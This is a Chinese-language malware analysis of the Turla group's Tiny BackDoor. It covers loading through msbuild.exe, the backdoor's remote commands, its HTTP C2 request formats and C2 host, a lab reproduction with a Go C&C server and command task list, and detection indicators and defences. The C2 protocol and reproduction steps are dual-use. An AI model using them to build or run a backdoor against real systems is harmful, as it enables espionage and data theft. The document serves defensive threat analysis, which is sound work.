Turla组织最新Tiny BackDoor后门通信模型剖析及攻击场景复现
字数 1549 2025-08-25 22:59:15
Turla组织Tiny BackDoor后门技术分析与防御指南
1. 概述
Turla组织(又称Snake、Uroburos)是一个具有国家背景的高级持续性威胁(APT)组织,主要针对政府机构、外交部门和军事组织进行网络间谍活动。近期发现该组织使用了一款名为"Tiny BackDoor"的新型后门程序,具有隐蔽性强、功能完善的特点。
本技术文档将详细分析该后门的:
- 技术实现细节
- 通信模型
- 攻击场景复现方法
- 检测与防御方案
2. 后门技术分析
2.1 加载方式
Tiny BackDoor采用MSBuild项目文件形式进行加载,利用合法系统工具实现无文件攻击:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe 后门文件
隐蔽技术:
- 创建线程隐藏MSBuild.exe窗口
- 使用系统合法进程作为载体
- 无文件驻留技术
2.2 功能模块
2.2.1 信息收集
后门首先收集以下主机信息并Base64编码:
- 当前用户所属域名(本地账户则获取计算机名)
- 当前用户名
- 当前进程ID
2.2.2 远控指令
支持7种远控指令:
| 指令 | 功能描述 |
|---|---|
| shell | 使用cmd执行shell命令 |
| sleep | 修改心跳间隔时间(默认1分钟) |
| upload | 上传文件到C&C服务器 |
| download | 从C&C服务器下载文件 |
| cd | 修改当前工作目录路径 |
| pwd | 显示当前工作目录路径 |
| ps | 使用PowerShell执行命令 |
2.2.3 通信加密
采用复合加密方案:
- Gzip压缩数据
- Base64编码处理
- 通过HTTPS传输
2.3 通信模型分析
2.3.1 心跳通信
请求1:
POST /advprod03/assets/plugin/tinymce/docs/php/index.php?m=c&id=<Base64编码的主机信息>
Content-Type: application/x-www-form-urlencoded
Host: ies.inquirer.com.ph
Content-Length: 0
响应1:
HTTP/1.0 200 OK
Content-Type: text/plain; charset=utf-8
<Base64编码的Gzip压缩指令>
2.3.2 指令执行
请求2:
POST /advprod03/assets/plugin/tinymce/docs/php/index.php?m=c&id=<主机信息>
Content-Type: application/x-www-form-urlencoded
Host: ies.inquirer.com.ph
Content-Length: <长度>
<Base64编码的Gzip压缩执行结果>
响应2:
HTTP/1.0 200 OK
Content-Length: 0
2.3.3 文件下载
请求3:
POST /advprod03/assets/plugin/tinymce/docs/php/index.php?m=f&id=<主机信息>&n=文件名
Content-Type: application/x-www-form-urlencoded
Host: ies.inquirer.com.ph
Content-Length: <长度>
<Base64编码的Gzip压缩文件内容>
2.3.4 文件上传
GET请求:
GET /advprod03/assets/plugin/tinymce/docs/php/index.php?m=f&id=<主机信息>&n=文件名
Content-Type: application/x-www-form-urlencoded
Host: ies.inquirer.com.ph
响应:
HTTP/1.0 200 OK
Content-Type: text/plain; charset=utf-8
<Base64编码的Gzip压缩文件内容>
3. 攻击场景复现
3.1 环境搭建
3.1.1 C&C服务器搭建(使用Golang)
代码结构:
├── common.go // 通用函数(编解码、文件操作)
├── main.go // 主程序入口
├── web.go // 请求处理逻辑
└── conf/
├── tasks2.txt // 预定义指令序列
└── tmp2.txt // 指令执行状态
关键功能实现:
- Base64编解码
- Gzip压缩解压
- 文件读写操作
- HTTP请求处理
3.1.2 指令序列配置(tasks2.txt)
示例指令序列:
[<pwd>]
[<cd>][{C:\\Users\\admin}]
[<pwd>]
[<shell>][{ipconfig}]
[<ps>][{dir}]
[<download>][{C:\\Users\\admin\\Desktop\\nc.exe}]
[<upload>][{C:\\Users\\admin\\Desktop\\123.exe}]
3.2 攻击流程演示
- 后门启动:通过msbuild.exe加载后门
- 初始连接:后门发送主机信息建立会话
- 指令下发:C&C服务器按tasks2.txt顺序发送指令
- 指令执行:
- 执行系统命令(ipconfig, dir等)
- 切换工作目录
- 文件上传下载
- 结果回传:执行结果加密后回传服务器
4. 检测与防御方案
4.1 检测指标(IOC)
网络特征:
- 请求URL包含路径:
/advprod03/assets/plugin/tinymce/docs/php/index.php - 参数包含:
m=c或m=f - 通信数据采用Base64+Gzip编码
主机特征:
- MSBuild.exe异常网络连接
- 异常进程树:msbuild.exe作为父进程
- 注册表中异常MSBuild项目
4.2 防御措施
-
应用控制:
- 限制msbuild.exe网络访问
- 实施白名单机制,控制MSBuild项目执行
-
网络监控:
- 监控异常Base64编码的HTTP流量
- 检测对已知C&C域名的访问
-
系统加固:
- 禁用不必要的.NET框架功能
- 定期审计MSBuild项目文件
-
终端防护:
- 部署EDR解决方案监控进程行为
- 启用内存保护机制
5. 总结
Turla组织的Tiny BackDoor后门展示了高级威胁组织的技术特点:
- 利用合法系统工具实现隐蔽加载
- 完善的远控功能设计
- 复杂的通信加密方案
- 针对性的攻击目标选择
防御此类威胁需要采取纵深防御策略,结合网络流量分析、终端行为监控和系统加固等多层次防护措施。